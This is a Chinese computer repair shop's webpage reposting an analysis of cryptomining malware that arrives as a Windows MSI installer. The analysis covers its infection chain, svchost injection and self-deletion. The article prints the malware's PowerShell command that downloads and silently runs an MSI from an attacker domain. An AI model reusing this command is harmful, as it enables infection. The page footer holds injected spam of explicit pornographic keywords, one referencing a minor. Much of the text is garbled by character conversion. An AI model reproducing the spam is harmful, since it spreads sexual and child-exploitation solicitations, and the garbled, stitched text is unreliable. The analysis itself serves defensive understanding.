錦州市廣廈電腦維修|上門(mén)維修電腦|上門(mén)做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁(yè)
topFlag3 收藏本站
 
maojin003 首 頁(yè) 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見(jiàn)故障
錦州市廣廈電腦維修|上門(mén)維修電腦|上門(mén)做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù)技術(shù)文章
加密貨幣挖礦惡意軟件使用Windows installer繞過(guò)技術(shù)

作者: 佚名  日期:2018-11-14 16:41:12   來(lái)源: 本站整理

 加密貨幣挖礦惡意軟件開(kāi)始使用一些包括Windows installer在內(nèi)的新的繞過(guò)技術(shù)。
加密貨幣挖礦惡意軟件數(shù)量不斷增長(zhǎng)的一個(gè)原因是其暴利性,另一個(gè)原因是可以在系統(tǒng)中不被檢測(cè)到,尤其是使用了不同的混淆技術(shù)后更難檢測(cè)。研究人員發(fā)現(xiàn),攻擊者在不斷的向加密貨幣挖礦惡意軟件中添加混淆技術(shù)來(lái)繞過(guò)AV的檢測(cè)。
安裝器行為

圖1. 惡意軟件感染鏈
惡意軟件以Windows installer MSI文件的形式到達(dá)受害者機(jī)器,Windows installer MSI文件是一個(gè)用于安裝軟件的合法應(yīng)用程序。使用真實(shí)的Windows組件可以使其看著不那么可疑,而且可以繞過(guò)一些安全過(guò)濾器。
研究人員分析樣本的安裝過(guò)程發(fā)現(xiàn),惡意MSI文件會(huì)將自己安裝到%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server目錄下,如果用戶設(shè)備上不存在該目錄,就會(huì)創(chuàng)建該目錄。該目錄含有許多不同的文件,作為攻擊鏈的一部分:
· bat – 用于終止正在運(yùn)行的反病毒軟件的腳步文件
· exe – 用于解壓釋放在另一個(gè)目錄中的icon.ico文件的解壓工具
· ico – 密碼保護(hù)的zip文件,顯示為icon文件
解壓icon.ico后出現(xiàn)兩個(gè)文件:
· ocx – 加載器模塊,負(fù)責(zé)解密和安裝加密貨幣挖礦模塊
· bin – 加密的,UPX打包的,Delphi 編譯的加密貨幣挖礦模塊
安裝過(guò)程的另一部分包含在%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server\{Random Numbers}中創(chuàng)建kernel文件ntdll.dll和Windows USER組件user32.dll。研究人員這是為了預(yù)防惡意軟件API的檢測(cè)。如下所示的配置文件也會(huì)釋放到 %UserTemp%\[Random Number]文件夾中。

圖2. 挖礦機(jī)的配置文件
安裝過(guò)程使用的語(yǔ)言是Cyrillic而非英語(yǔ),這或許暗示著惡意軟件來(lái)源的區(qū)域。

圖3. 安裝過(guò)程顯示窗口
進(jìn)程注入和監(jiān)視器創(chuàng)建
安裝后,在執(zhí)行以下命令前,ex.exe文件會(huì)解壓icon.ico文件:
 rundll32 default.ocx,Entry u
為注入代碼創(chuàng)建3個(gè)新Service Host (svchost.exe)進(jìn)程。前兩個(gè)SvcHost進(jìn)程起著監(jiān)視器的作用。當(dāng)注入的svchost進(jìn)程中止后,這兩個(gè)進(jìn)程負(fù)責(zé)通過(guò)powerShell命令重新下載Windows Installer (.msi)文件。
“powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[‘User-Agent’] = ‘Windows Installer’;$f = ‘C:\%UserTemp%\{random number}.msi’; $cli.DownloadFile(‘hxxps://superdomain1709[.]info/update[.]txt’, $f);Start-Process $f -ArgumentList ‘/q’”
然后將第三個(gè)SvcHost進(jìn)程注入到挖礦機(jī)模塊并使用下面的命令執(zhí)行:
“%system32%\svchost.exe –config={malware configuration path}

圖4. 第三個(gè)Service Host進(jìn)程
為了使用檢測(cè)和分析變得更難,惡意軟件還有自毀機(jī)制。首先,創(chuàng)建和執(zhí)行下面的文件:
 {Random Characters}.cmD 
然后刪除安裝目錄中的所有文件,并移除系統(tǒng)內(nèi)所有的安裝痕跡。
惡意軟件非常特別的一點(diǎn)是使用主流的Windows Installer builder WiX作為打包器,有點(diǎn)像一層反檢測(cè)層。這也說(shuō)明攻擊者在不斷努力來(lái)保證其創(chuàng)建活動(dòng)處于隱蔽狀態(tài)。
 



熱門(mén)文章
  • 機(jī)械革命S1 PRO-02 開(kāi)機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過(guò)串口命令查看EMMC擦寫(xiě)次數(shù)和判...
  • IIS 8 開(kāi)啟 GZIP壓縮來(lái)減少網(wǎng)絡(luò)請(qǐng)求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對(duì)講門(mén)禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開(kāi)機(jī)界面...
  • 常見(jiàn)打印機(jī)清零步驟
  • 安裝驅(qū)動(dòng)時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門(mén)維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號(hào):遼ICP備2023002984號(hào)-1
    上門(mén)服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門(mén)維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無(wú)線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤(pán)刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 午夜不卡无码中文字幕影院| 无码天堂va亚洲va在线va| 无码精品人妻一区二区三区免费 | 蜜桃臀无码内射一区二区三区| 在线精品自拍无码| 激情无码人妻又粗又大中国人 | 97无码免费人妻超级碰碰碰碰 | 无码人妻丰满熟妇区五十路百度| 国产99久久九九精品无码| 亚洲aⅴ天堂av天堂无码麻豆| 亚洲日韩中文无码久久| 成人免费无码大片A毛片抽搐色欲| 无码精品人妻一区二区三区AV| 久久精品无码专区免费青青 | 无码AV中文字幕久久专区| 无码国产69精品久久久久孕妇| 无码午夜成人1000部免费视频 | 亚洲人av高清无码| 无码丰满少妇2在线观看| 日韩精品无码Av一区二区| 亚洲精品无码久久久久久久 | 亚洲av成人中文无码专区| 国产在线无码一区二区三区视频 | 熟妇人妻无码xxx视频| 久久精品aⅴ无码中文字字幕不卡| 无码人妻丰满熟妇啪啪| 99久无码中文字幕一本久道| 无码永久免费AV网站| 亚洲日韩精品无码专区加勒比| 无码囯产精品一区二区免费| 小13箩利洗澡无码视频网站| 伊人久久精品无码av一区| 无码午夜成人1000部免费视频| 国产亚洲精品无码拍拍拍色欲| 人妻无码一区二区视频| 国内精品人妻无码久久久影院| 亚洲中文字幕无码爆乳av中文 | 无码国产色欲XXXXX视频| 伊人久久综合精品无码AV专区| 中文无码伦av中文字幕| 国产AV无码专区亚汌A√|